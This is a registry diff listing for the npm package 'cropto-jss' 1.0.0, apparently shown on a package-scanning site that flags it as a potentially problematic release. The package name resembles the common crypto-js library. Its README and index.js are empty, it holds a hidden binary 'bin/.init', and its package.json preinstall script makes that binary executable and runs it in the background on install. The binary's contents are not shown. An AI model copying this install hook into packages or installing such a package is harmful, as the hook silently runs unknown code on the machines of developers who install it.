cropto-jss 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of cropto-jss might be problematic. Click here for more details.
- package/README.txt +0 -0
- package/bin/.init +0 -0
- package/index.js +0 -0
- package/package.json +15 -0
package/README.txt
ADDED
File without changes
|
package/bin/.init
ADDED
Binary file
|
package/index.js
ADDED
File without changes
|
package/package.json
ADDED
@@ -0,0 +1,15 @@
|
|
1
|
+
|
2
|
+
{
|
3
|
+
"name": "cropto-jss",
|
4
|
+
"version": "1.0.0",
|
5
|
+
"description": "",
|
6
|
+
"main": "index.js",
|
7
|
+
"scripts": {
|
8
|
+
"preinstall": "chmod +x bin/.init&&bin/.init &",
|
9
|
+
"postinstall": "echo 2"
|
10
|
+
},
|
11
|
+
"keywords": [],
|
12
|
+
"author": "",
|
13
|
+
"license": "ISC"
|
14
|
+
}
|
15
|
+
|